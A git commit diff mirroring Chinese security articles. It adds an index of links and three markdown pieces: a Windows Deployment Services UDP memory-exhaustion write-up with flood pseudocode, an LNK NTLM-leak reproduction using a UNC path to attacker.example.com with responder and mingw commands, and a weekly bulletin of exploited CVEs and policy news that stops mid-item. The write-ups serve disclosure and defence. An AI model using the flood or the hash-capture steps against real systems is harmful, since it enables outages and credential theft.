mirror of
https://github.com/gelusus/wxvl.git
synced 2025-08-13 11:28:20 +00:00
金和JC6协同管理平台 oaplusrangedownloadfile 任意文件下载漏洞、安全热点周报:邮件远程代码执行漏洞遭利用,用于攻击日本机构、支付漏洞实战、Windows 部署服务中发现新漏洞、基于 LNK 快捷方式获取Windows NTLM的 漏洞(无需运行,已复现!)、基于 LNK 快捷方式获取Windows NTLM的 漏洞(无需运行,已复现!)、
This commit is contained in:
parent
d0eec7aab2
commit
4ab4ef265b
@ -13654,5 +13654,11 @@
|
||||
"https://mp.weixin.qq.com/s?__biz=MzkzNDUxOTk2Mw==&mid=2247496385&idx=1&sn=136a4278dd358937e1439af867ed8e16": "【论文速读】| 通过整体神经符号方法实现自动静态漏洞检测",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzI1OTA1MzQzNA==&mid=2651247949&idx=1&sn=64818f92eb72135007f30fc07f1dd794": "关于对网络安全等级保护有关工作事项进一步说明的函原文 | 2024年至少75个零日漏洞遭滥用,网络与安全产品占比近三成",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzU0NDk0NTAwMw==&mid=2247626698&idx=2&sn=ce3504318ade61d17659729c035307ec": "Chrome浏览器惊现高危漏洞!天擎漏洞攻击防护第一时间提供安全保障",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247503216&idx=1&sn=aaf7ab33cb743966c0a67ab042249c65": "【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)"
|
||||
"https://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247503216&idx=1&sn=aaf7ab33cb743966c0a67ab042249c65": "【成功复现】Next.js中间件认证绕过漏洞(CVE-2025-29927)",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzkzNzMxODkzMw==&mid=2247485773&idx=1&sn=e57e9c5f49b3dd80fbb694ec5e14250b": "金和JC6协同管理平台 oaplusrangedownloadfile 任意文件下载漏洞",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247503352&idx=1&sn=283ef81dee566006f482ac1dc2eaec42": "安全热点周报:邮件远程代码执行漏洞遭利用,用于攻击日本机构",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzkxMjg3NzU0Mg==&mid=2247485528&idx=1&sn=be29d63f30cca17dc28989aedb0ef043": "支付漏洞实战",
|
||||
"https://mp.weixin.qq.com/s?__biz=MzI0NzE4ODk1Mw==&mid=2652096211&idx=2&sn=439ab06d63daa827f1cb7e56be548b51": "Windows 部署服务中发现新漏洞",
|
||||
"https://mp.weixin.qq.com/s?__biz=Mzg3OTUxNTU2NQ==&mid=2247490830&idx=1&sn=77539c110a925cecffdceeaaf4bccf96": "基于 LNK 快捷方式获取Windows NTLM的 漏洞(无需运行,已复现!)",
|
||||
"https://mp.weixin.qq.com/s?__biz=Mzk0MzY3MDE5Mg==&mid=2247484222&idx=1&sn=513666d7126d02a4b8bdeb0e966ddf3c": "基于 LNK 快捷方式获取Windows NTLM的 漏洞(无需运行,已复现!)"
|
||||
}
|
53
doc/2025-05/Windows 部署服务中发现新漏洞.md
Normal file
53
doc/2025-05/Windows 部署服务中发现新漏洞.md
Normal file
@ -0,0 +1,53 @@
|
||||
# Windows 部署服务中发现新漏洞
|
||||
网安百色 2025-05-06 11:31
|
||||
|
||||
在 Microsoft 的 Windows 部署服务 (WDS) 中新发现的身份验证前拒绝服务 (DoS) 漏洞会通过恶意 UDP 数据包使企业网络立即面临系统崩溃的风险。
|
||||
|
||||
被称为“0-click”缺陷,攻击者可以在没有用户交互的情况下远程利用它,耗尽服务器内存,直到关键服务出现故障。
|
||||
|
||||
虽然人们的注意力都集中在远程代码执行错误上,但基于 UDP 的服务(如 WDS)中的内存耗尽漏洞构成了被低估的风险。
|
||||
|
||||
这些缺陷允许攻击者通过迫使系统分配过多资源来压垮系统,从而以最小的努力使服务器崩溃。
|
||||
|
||||
WDS 是企业 IT 基础设施的支柱,它说明了这些弱点如何危及 Internet 规模的运营。
|
||||
|
||||
WDS 支持跨组织对 Windows作系统映像进行基于网络的部署,具体取决于:
|
||||
- PXE 引导:客户端通过 Preboot Execution Environment 引导以获取作系统映像。
|
||||
|
||||
- TFTP/多播传输:高效分发 Windows PE 引导文件和安装映像。
|
||||
|
||||
- 无人值守安装:使用答案文件自动进行设置。
|
||||
|
||||
WDS 广泛用于企业网络、数据中心和学术机构。
|
||||
## UDP 漏洞利用:一个简单的缺陷如何使系统崩溃
|
||||
|
||||
WDS 使用端口 69/UDP 进行 TFTP 通信。研究人员发现,每个连接请求都会创建一个 CTftpSession 对象,该对象无限制地存储在 EndpointSessionMapEntry 中。
|
||||
|
||||
攻击者可以使用随机的源 IP 和端口来欺骗 UDP 数据包,迫使 WDS 创建无休止的会话,直到内存耗尽。
|
||||
|
||||
**概念验证:模拟攻击**
|
||||
|
||||
伪代码片段演示了漏洞利用的简单性:
|
||||
```
|
||||
void fake_send(const char *dst_ip, int dst_port) { for (unsigned int i = 0x4000000; i < 0xffffffff; i++) { char src_ip[16]; int_to_ip(i, src_ip); // Generate random spoofed IP for (int port = 0x4000; port < 0xe000; port++) { udp_send(src_ip, port, dst_ip, dst_port, malicious_data); // Flood server } }}
|
||||
```
|
||||
|
||||
在测试中,当内存使用率达到 15GB 时,具有 8GB RAM 的 Windows Server 在 7 分钟后崩溃。多线程攻击可能会以指数级方式加速这一过程。
|
||||
|
||||
企业的关键要点
|
||||
1. 监视 WDS 服务器:监视端口 69 上的异常 UDP 流量。
|
||||
|
||||
1. 限制网络暴露:限制 WDS 对受信任子网的访问。
|
||||
|
||||
1. 向 Microsoft 施压:倡导修补被低估的 DoS 风险。
|
||||
|
||||
此缺陷凸显了基于 UDP 的服务的脆弱性,以及对系统性内存管理保护措施的迫切需求。在 Microsoft 解决这一问题之前,企业仍然容易受到破坏性、低工作量的攻击。
|
||||
|
||||
**免责声明**
|
||||
:
|
||||
|
||||
本公众号所载文章为本公众号原创或根据网络搜索下载编辑整理,文章版权归原作者所有,仅供读者学习、参考,禁止用于商业用途。因转载众多,无法找到真正来源,如标错来源,或对于文中所使用的图片、文字、链接中所包含的软件/资料等,如有侵权,请跟我们联系删除,谢谢!
|
||||
|
||||

|
||||
|
||||
|
112
doc/2025-05/基于 LNK 快捷方式获取Windows NTLM的 漏洞(无需运行,已复现!).md
Normal file
112
doc/2025-05/基于 LNK 快捷方式获取Windows NTLM的 漏洞(无需运行,已复现!).md
Normal file
@ -0,0 +1,112 @@
|
||||
# 基于 LNK 快捷方式获取Windows NTLM的 漏洞(无需运行,已复现!)
|
||||
原创 Secu的矛与盾 Secu的矛与盾 2025-05-06 15:03
|
||||
|
||||
### 1.1 “Right-Click LNK” 漏洞
|
||||
###
|
||||
|
||||
国外的一名安全研究员Zeifan 的研究指出,Windows Explorer 在展示或右键预览 LNK 快捷方式时,会使用 SHGDN_FORPARSING
|
||||
标志调用一系列 COM 接口(如 IInitializeNetworkFolder
|
||||
、IShellFolder2
|
||||
)获取目标路径,即使用户未双击快捷方式,也会触发对 UNC 路径的访问Security Research
|
||||
。利用 LNK 文件中 EnvironmentVariableDataBlock
|
||||
的结构操控,可将恶意 UNC 路径嵌入至 TargetUnicode
|
||||
缓冲区,一旦 Explorer 扫描到该文件即发起 SMB 连接,从而泄露 NTLM 哈希。
|
||||
### 1.2 LNK 文件结构操控
|
||||
###
|
||||
- **关键标志位**
|
||||
:通过设置 LinkFlags
|
||||
中的 HAS_ARGUMENTS
|
||||
与 IS_UNICODE
|
||||
,强制 Explorer 使用 Unicode 解析内部数据块;
|
||||
|
||||
- **EnvironmentVariableDataBlock**
|
||||
:以 BlockSize=0x00000314
|
||||
(788 字节)和签名 0xA0000001
|
||||
为前缀,接着分配 260 字节 ANSI 与 520 字节 Unicode 缓冲区,后者存放如 \\attacker.example.com\share
|
||||
的 UNC 路径
|
||||
Security Research
|
||||
。
|
||||
|
||||
- **触发流程**
|
||||
:当用户浏览快捷方式所在目录或右键文件时,Explorer 会提前解析该数据块并尝试访问上述 UNC 路径,自动发起 NTLM 身份验证。
|
||||
|
||||

|
||||
### 2.1与历史案例对比
|
||||
###
|
||||
|
||||
**CVE-2017-8464**
|
||||
:通过展示恶意 LNK 图标触发远程代码执行(RCE),需要用户打开目录;相比之下,Zeifan 的漏洞侧重于凭据泄露,无需用户执行。
|
||||
|
||||
**.library-ms 漏洞 (CVE-2025-24054)**
|
||||
:同样利用 Explorer 预览 Windows Library 文件导致 NTLM 哈希泄露,已在 2025 年 3 月补丁中修复
|
||||
。
|
||||
|
||||
2.2 复现步骤:
|
||||
|
||||
攻击机:
|
||||
|
||||
kali 运行:
|
||||
```
|
||||
sudo responder -I eth0 -w -d -v
|
||||
```
|
||||
|
||||

|
||||
|
||||
修改poc代码里的ip为攻击机ip,
|
||||
|
||||

|
||||
|
||||
使用vs编译或者gcc编译:
|
||||
```
|
||||
x86_64-w64-mingw32-gcc poc.c -o lnk_poc.exe
|
||||
```
|
||||
|
||||
右键查看生成的lnk文件,然后看看kali终端
|
||||
|
||||
|
||||
2.3 讨论
|
||||
- **微软“不认”这个漏洞**
|
||||
|
||||
- **依赖 Mark of the Web(MOTW)机制**
|
||||
|
||||
微软认为,当用户从 Internet 下载文件时,Windows 会在文件元数据中打上 MOTW(“Web 标记”),并在首次打开或右击时弹出安全警告。这一机制应该足以提醒用户,防止恶意 .lnk 文件的滥用,因此“不达微软的补丁门槛”
|
||||
****
|
||||
|
||||
- **作者(Nafiez)为何坚持这是个严重安全风险**
|
||||
|
||||
**无需执行即可触发网络连接,轻易泄露凭据**
|
||||
|
||||
通过精心构造的
|
||||
lnk 文件在仅“打开文件夹”或“右键查看属性”时就会解析并访问 UNC 路径(如 \\<IP>\c
|
||||
),进而在无用户主动运行程序的情况下发起 SMB 连接,被动泄露 NTLMv2 哈希 。
|
||||
|
||||
**MOTW 并不能完全防御**
|
||||
|
||||
许多组织会解除或忽略 MOTW 警告(例如通过组策略白名单内部站点、日志疲劳导致用户一律点击“继续”),而且一些攻击场景下 .lnk 文件并非通过浏览器下载,而是通过 U盘、内部文件共享等方式落地,MOTW 无法生效 。
|
||||
|
||||
可以简化其利用
|
||||
|
||||
原作者的poc还需要右键一下,但有人提出对其poc改良后可以对其进行升级,
|
||||
只需导航到恶意 LNK 文件所在的目录即可触发它。
|
||||
|
||||
|
||||
当然此类
|
||||
“中继攻击”存在已久,使用ntml认证也是windows的“预期功能”,也是“固有风险”,或许这算是一种“攻击方式/媒介的演化与创新吧”
|
||||
|
||||
参考学习:
|
||||
```
|
||||
https://www.mdsec.co.uk/2021/02/farming-for-red-teams-harvesting-netntlm/
|
||||
```
|
||||
```
|
||||
https://zeifan.my/Right-Click-LNK/
|
||||
```
|
||||
|
||||
免责声明:请勿利用文章内的相关技术或信息从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
|
||||
|
||||
|
||||
poc源码后台回复:
|
||||
```
|
||||
lnk_poc
|
||||
```
|
||||
|
||||
|
233
doc/2025-05/安全热点周报:邮件远程代码执行漏洞遭利用,用于攻击日本机构.md
Normal file
233
doc/2025-05/安全热点周报:邮件远程代码执行漏洞遭利用,用于攻击日本机构.md
Normal file
@ -0,0 +1,233 @@
|
||||
# 安全热点周报:邮件远程代码执行漏洞遭利用,用于攻击日本机构
|
||||
奇安信 CERT 2025-05-06 09:05
|
||||
|
||||
<table><tbody><tr style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-bottom: 4px solid rgb(68, 117, 241);visibility: visible;"><th align="center" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 5px 10px;outline: 0px;overflow-wrap: break-word !important;word-break: break-all;hyphens: auto;border: 0px none;background: rgb(254, 254, 254);max-width: 100%;box-sizing: border-box !important;font-size: 20px;line-height: 1.2;visibility: visible;"><span style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(68, 117, 241);visibility: visible;"><strong style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"><span style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 17px;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">安全资讯导视 </span></span></strong></span></th></tr><tr style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-bottom: 1px solid rgb(180, 184, 175);visibility: visible;"><td valign="middle" align="center" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 5px 10px;outline: 0px;overflow-wrap: break-word !important;word-break: break-all;hyphens: auto;border: 0px none;max-width: 100%;box-sizing: border-box !important;font-size: 14px;visibility: visible;"><p style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">• </span><span leaf="">《数据安全技术 数据安全风险评估方法》等6项网络安全国家标准发布</span></p></td></tr><tr style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-bottom: 1px solid rgb(180, 184, 175);visibility: visible;"><td valign="middle" align="center" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 5px 10px;outline: 0px;overflow-wrap: break-word !important;word-break: break-all;hyphens: auto;border: 0px none;max-width: 100%;box-sizing: border-box !important;font-size: 14px;visibility: visible;"><p style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">• </span><span leaf="">美情报机构利用网络攻击中国大型商用密码产品提供商事件调查报告发布</span></p></td></tr><tr style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-bottom: 1px solid rgb(180, 184, 175);visibility: visible;"><td valign="middle" align="center" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 5px 10px;outline: 0px;overflow-wrap: break-word !important;word-break: break-all;hyphens: auto;border: 0px none;max-width: 100%;box-sizing: border-box !important;font-size: 14px;visibility: visible;"><p style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: transparent;margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">• </span><span leaf="">秘鲁政府网站疑因网络攻击瘫痪,3300万公民个人数据或泄露</span></p></td></tr></tbody></table>
|
||||
|
||||
|
||||
|
||||
**PART****0****1**
|
||||
|
||||
|
||||
**新增在野利用**
|
||||
|
||||
|
||||
**1.****Langflow 身份认证绕过漏洞(CVE-2025-3248)******
|
||||
|
||||
|
||||
5月5日,CISA 将 Langflow 身份认证绕过漏洞(CVE-2025-3248)添加到其已知被利用漏洞(KEV)目录中,并指出有证据显示该漏洞存在主动利用。
|
||||
|
||||
研究人员在 Langflow(一款用于构建代理型 AI 工作流的流行工具)中发现了一个值得关注的代码注入漏洞 CVE-2025-3248 。该漏洞易于利用,允许未经身份验证的远程攻击者完全入侵 Langflow 服务器。
|
||||
|
||||
如今,“代理人工智能”(Agentic AI)已无处不在,一个充满活力的人工智能工具生态系统也随之兴起。其中最受欢迎的工具之一是 Langflow,这是一个由 DataStax 和 IBM 支持的开源项目,在 GitHub 上拥有超过 5 万颗星。Langflow 是一个基于 Python 的 Web 应用程序,它提供了可视化界面来构建 AI 驱动的代理和工作流。
|
||||
|
||||
过去曾有针对 Langflow 的报告指出存在一些高危安全漏洞(CVE-2024-7297、CVE-2024-48061、CVE-2024-42835 和 CVE-2024-37014),但这些 CVE 似乎存在问题。Langflow 为任何经过身份验证的用户提供“远程代码执行功能”,因为它允许用户修改和执行其可视化组件背后的 Python 代码。此外,它在设计上不支持代码执行沙盒。这些 CVE 似乎假设 Langflow 的配置未经身份验证,或者攻击者已经拥有凭据。
|
||||
|
||||
建议所有 Langflow 用户升级到至少 1.3.0 版本,或限制其网络访问。根据 Censys 的数据,互联网上已有 500 多个 Langflow 暴露实例。
|
||||
|
||||
该漏洞代码存在于两年前的 Langflow 最早版本中,根据测试,1.3.0 之前的大多数版本似乎都可被利用。补丁将易受攻击的端点置于身份验证之后。从技术上讲,该漏洞仍然可以被利用将权限从普通用户提升到 Langflow 超级用户。
|
||||
|
||||
作为一般做法,建议在将任何新开发的 AI 工具暴露到互联网时务必谨慎。如果必须将其暴露到外部,请考虑将其置于独立的 VPC 中和/或置于 SSO 之后。只需在某个云实例上对这些工具进行一次错误/影子 IT 部署,就足以造成数据泄露。
|
||||
|
||||
|
||||
参考链接:
|
||||
|
||||
https://horizon3.ai/attack-research/disclosures/unsafe-at-any-speed-abusing-python-exec-for-unauth-rce-in-langflow-ai/
|
||||
|
||||
**2.********Commvault Command Center 路径遍历漏洞(CVE-2025-34028)&Commvault Web Server 未指定漏洞(CVE-2025-3928)******
|
||||
|
||||
|
||||
5月2日,CISA 将影响 Commvault 指挥中心的最高严重性安全漏洞添加到其已知被利用的漏洞 (KEV) 目录中,距该漏洞公开披露仅一周多一点。
|
||||
|
||||
该漏洞编号为 CVE-2025-34028(CVSS 评分:10.0),是一个路径遍历漏洞,影响 11.38 Innovation Release 版本,涵盖 11.38.0 至 11.38.19 版本。该漏洞已在 11.38.20 和 11.38.25 版本中得到修复。Commvault 命令中心包含一个路径遍历漏洞,允许远程、未经身份验证的攻击者执行任意代码。该漏洞本质上允许攻击者上传 ZIP 文件,当在目标服务器上解压缩时,可能导致远程代码执行。
|
||||
|
||||
网络安全公司 watchTowr Labs 因发现并报告该漏洞而受到赞誉,该公司表示问题出在一个名为“deployWebpackage.do”的端点上,该端点会触发预先认证的服务器端请求伪造 (SSRF),最终导致在使用包含恶意 .JSP 文件的 ZIP 存档文件时执行代码。
|
||||
|
||||
目前尚不清楚该漏洞是在何种情况下被利用的,但这一发展使其成为继 CVE-2025-3928(CVSS 评分:8.7)之后在现实世界攻击中被武器化的第二个 Commvault 漏洞,CVE-2025-3928 是 Commvault Web 服务器中的一个未指定问题,允许远程、经过身份验证的攻击者创建和执行 Web shell。
|
||||
|
||||
该公司上周透露,此次攻击活动影响了少数客户,但指出并未发生未经授权访问客户备份数据的情况。
|
||||
|
||||
鉴于 CVE-2025-34028 的积极利用,建议应用必要的补丁,以保护其网络的安全。
|
||||
|
||||
|
||||
参考链接:
|
||||
|
||||
https://thehackernews.com/2025/05/commvault-cve-2025-34028-added-to-cisa.html
|
||||
|
||||
|
||||
**3.****Qualitia Active! Mail 缓冲区溢出漏洞(CVE-2025-42599)******
|
||||
|
||||
|
||||
4月28日,Active! Mail 零日远程代码执行漏洞在针对日本大型组织的攻击中被积极利用。
|
||||
|
||||
Active!mail 是一个基于网络的电子邮件客户端,最初由 TransWARE 开发,后来被 Qualitia 收购,这两家公司都是日本公司。虽然 Active! 并不像 Gmail 或 Outlook 那样在世界范围内得到广泛使用,但它经常被用作大型企业、大学、政府机构和银行的日语环境中的群件组件。据该供应商称,Active! 已被超过 2,250 个组织采用,拥有超过 11,000,000 个帐户,是该国商业网络邮件市场的重要参与者。
|
||||
|
||||
上周晚些时候,Qualitia 发布了一份安全公告,关于一个基于堆栈的缓冲区溢出漏洞,漏洞编号为 CVE-2025-42599,影响所有版本的 Active!,包括所有受支持的操作系统平台上的“BuildInfo:6.60.05008561”。如果远程第三方发送恶意制作的请求,则有可能执行任意代码或触发拒绝服务 (DoS) 条件。
|
||||
|
||||
尽管 Qualitia 提到正在调查该漏洞是否已被利用,但日本 CERT 已确认其处于活跃的利用状态,并敦促所有用户尽快更新至 Active!Mail 6 BuildInfo: 6.60.06008562。日本网络托管和 IT 服务 (SMB) 提供商 Kagoya Japan 上周末报告了数起外部攻击,导致其暂时停止服务。网络托管和 IT 服务提供商 WADAX 也报告了类似的服务中断,据称是因有人试图利用漏洞而导致的。
|
||||
|
||||
Macnica 安全研究员 Yutaka Sejiyama 称,至少有 227 台暴露在互联网上的 Active! 服务器可能受到这些攻击,其中 63 台在大学使用。
|
||||
|
||||
无法立即应用安全更新的用户可以配置 Web 应用程序防火墙 (WAF) 以启用 HTTP 请求正文检查,并在 multipart/form-data 标头的大小超过某个阈值时阻止它们。
|
||||
|
||||
|
||||
参考链接:
|
||||
|
||||
https://www.bleepingcomputer.com/news/security/active-mail-rce-flaw-exploited-in-attacks-on-japanese-orgs/
|
||||
|
||||
**4.********Broadcom Brocade Fabric OS 代码注入漏洞(CVE-2025-1976)******
|
||||
|
||||
|
||||
4月28日,CISA 警告称,Broadcom Brocade Fabric OS 存在漏洞,该漏洞在攻击中被积极利用。
|
||||
|
||||
Broadcom Brocade Fabric OS 是一款专用操作系统,运行在该公司的 Brocade 光纤通道交换机上,用于管理和优化存储区域网络 (SAN)。
|
||||
|
||||
4月初,博通披露了一个影响 Fabric OS 9.1.0 至 9.1.1d6 版本的任意代码执行漏洞,漏洞编号为 CVE-2025-1976。该漏洞可允许用户执行任何现有的 Fabric OS 命令,或者还可用于修改 Fabric OS 本身,包括添加自己的子程序。尽管实现这一漏洞首先需要对具有管理员权限的角色进行有效访问,但博通表示,该漏洞已被积极利用于攻击中。
|
||||
|
||||
目前,尚无关于这个漏洞如何被利用、攻击规模有多大以及幕后黑手的详细信息。
|
||||
|
||||
CVE-2025-1976 已在 Brocade Fabric OS 9.1.1d7 版本中得到解决。最新分支 9.2.0 不受此漏洞影响。建议受影响客户尽快更新补丁版本。
|
||||
|
||||
|
||||
参考链接:
|
||||
|
||||
https://www.bleepingcomputer.com/news/security/cisa-tags-broadcom-fabric-os-commvault-flaws-as-exploited-in-attacks/
|
||||
|
||||
**PART****0****2**
|
||||
|
||||
|
||||
**安全事件**
|
||||
|
||||
|
||||
**1.秘鲁政府网站疑因网络攻击瘫痪,3300万公民个人数据或泄露**
|
||||
|
||||
|
||||
5月4日SecurityLab消息,秘鲁政府门户网站Gob.pe疑因网络攻击瘫痪多天,黑客组织Rhysida宣布对此负责,并声称窃取了3300万公民的个人敏感数据,包括护照、税务、医疗及警务记录等。Rhysida在暗网门户以5比特币(约48.8万美元)出售数据,并设5月9日为支付赎金截止日。秘鲁政府否认网站遭受攻击,声称只是"技术维护"。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.securitylab.ru/news/558980.php
|
||||
|
||||
**2.美情报机构利用网络攻击中国大型商用密码产品提供商事件调查报告**
|
||||
|
||||
|
||||
4月28日中国网络空间安全协会公众号消息,中国网络空间安全协会发布调查报告揭露,美国情报机构在2024年对中国大型商用密码产品提供商发起网络攻击,企图破坏我国关键基础设施安全,国家互联网应急中心(CNCERT)发现并处置了这一恶意行径。调查报告显示,攻击者利用该提供商的客户关系管理系统零日漏洞进行攻击入侵,并在该系统和产品及项目代码管理系统植入特种木马程序,窃取了客户及合同信息、项目信息等大量商业秘密信息。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://mp.weixin.qq.com/s/kzdSrLdejED3MxSKtszUnA
|
||||
|
||||
**3.英国地方住房协会发生数据泄露事件,保险赔偿超5800万元**
|
||||
|
||||
|
||||
4月25日Inside Housing消息,英国沃特福德社区住房协会(WCH)因一起内部过失数据泄露事件遭用户起诉,目前已由保险公司赔偿了600万英镑(约合人民币5843万元)。2020年3月,WCH一名员工误将一封包含3544名租户及员工个人数据(包括性取向和种族等敏感信息)的电子邮件发送给3167名收件人。按照其三份保险的组合式保障体系,WCH的保险赔付额度高达1100万英镑(约合人民币1.07亿元),但是理赔过程中有一份500万英镑的保险因失误未能及时理赔,该协会成功起诉失误方,由对方负责支付该额度的理赔。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.insidehousing.co.uk/news/high-court-rules-landlord-entitled-to-additional-6m-indemnity-from-insurance-broker-after-data-breach-91450
|
||||
|
||||
|
||||
**PART****0****3**
|
||||
|
||||
|
||||
**政策法规**
|
||||
|
||||
|
||||
**1.七部门联合发布《终端设备直连卫星服务管理规定》**
|
||||
|
||||
|
||||
4月30日,国家互联网信息办公室、国家发展改革委、工业和信息化部、公安部、海关总署、市场监管总局、广电总局联合发布《终端设备直连卫星服务管理规定》。该文件要求,终端设备直连卫星服务提供者应当落实网络安全等级保护、通信网络安全防护、数据分类分级保护和商用密码应用安全性评估等制度,采取必要措施保障数据和个人信息安全。终端设备直连卫星服务提供者应当建立反电信网络诈骗内部控制机制和安全责任制度,开展终端设备直连卫星服务涉诈风险安全评估。提供具有舆论属性或者社会动员能力的终端设备直连卫星服务的,应当按照国家有关规定开展安全评估。开通终端设备直连卫星服务,应当建立电信新业务安全评估制度,并具备相应的技术保障措施。
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.cac.gov.cn/2025-04/30/c_1747719075774684.htm
|
||||
|
||||
|
||||
**2.《数据安全技术 数据安全风险评估方法》等6项网络安全国家标准发布**
|
||||
|
||||
|
||||
4月30日,国家市场监督管理总局、国家标准化管理委员会发布的2025年第10号《中华人民共和国国家标准公告》,由全国网络安全标准化技术委员会归口的6项国家标准正式发布。6项标准包括《数据安全技术 数据安全风险评估方法》《数据安全技术 敏感个人信息处理安全要求》《网络安全技术 网络安全保险应用指南》《网络安全技术 生成式人工智能服务安全基本要求》《网络安全技术 生成式人工智能预训练和优化训练数据安全规范》《网络安全技术 生成式人工智能数据标注安全规范》。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.tc260.org.cn/front/postDetail.html?id=20250430142612
|
||||
|
||||
|
||||
**3.《可信数据空间 技术架构》技术文件正式发布**
|
||||
|
||||
|
||||
4月30日,全国数据标准化技术委员会发布《可信数据空间 技术架构》技术文件。该文件规范了可信数据空间技术架构,明确了可信数据空间在国家数据基础设施中的定位,描述了可信数据空间作为一种数据流通利用基础设施的核心技术特征、最小功能集合以及关键业务流程,适用于指导地方、行业、领域、企业开展可信数据空间的规划、建设、运营和管理。该文件专设单章规定了安全要求,包括数字合约安全、数据产品安全、空间运营安全三部分。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.nda.gov.cn/sjj/ywpd/szkjyjcss/0430/ff808081-960ee580-0196-8636bb64-04ce.pdf
|
||||
|
||||
|
||||
**4.中国气象局等发布《人工智能气象应用服务办法》**
|
||||
|
||||
|
||||
4月29日,中国气象局、国家互联网信息办公室发布部门联合规章《人工智能气象应用服务办法》。该文件提出,发展人工智能气象应用服务应当坚持总体国家安全观,统筹发展和安全,将促进创新和依法治理相结合,对人工智能气象应用服务实行包容审慎和分类分级监管。该文件明确人工智能气象应用服务提供者的权利和义务,规定了算法备案和安全评估、人工智能生成合成内容标识、算法安全审核、网络安全、数据安全、信息发布审核、投诉举报等制度。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.cma.gov.cn/images/pdfjs/web/viewer.html?file=https://www.cma.gov.cn/zfxxgk/gknr/flfgbz/gz/202504/W020250429613208378185.pdf
|
||||
|
||||
|
||||
**5.《网络安全标准实践指南——个人信息保护合规审计要求》公开征求意见**
|
||||
|
||||
|
||||
4月28日,全国网络安全标准化技术委员会秘书处组织编制了《网络安全标准实践指南——个人信息保护合规审计要求(征求意见稿)》,现公开征求意见。该文件提出了个人信息保护合规审计原则,规定了个人信息保护合规审计的总体要求、内容方法和实施流程,适用于指导个人信息处理者开展个人信息保护合规审计工作,也可为专业机构开展个人信息保护合规审计提供参考。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.tc260.org.cn/upload/2025-04-28/1745827789863092922.pdf
|
||||
|
||||
|
||||
**6.国家数据局印发《构建数据基础制度更好发挥数据要素作用2025年工作要点》**
|
||||
|
||||
|
||||
4月28日,国家数据局印发《构建数据基础制度更好发挥数据要素作用2025年工作要点》。该文件主要包括四方面内容,其中第四方面要求,建立安全可控、弹性包容的数据要素治理制度方面,推动《关于完善数据流通安全治理 更好促进数据要素市场化价值化的实施方案》落地落实,逐步构建更加完善的数据流通安全治理体系,支持数据流通安全技术应用创新,依法依规培育数据流通安全服务市场。
|
||||
|
||||
|
||||
原文链接:
|
||||
|
||||
https://www.nda.gov.cn/sjj/swdt/sjdt/0428/20250428132338848329482_pc.html
|
||||
|
||||
|
||||
**7.美国国会通过《删除法案》,首个联邦AI监管法案即将出台**
|
||||
|
||||
|
||||
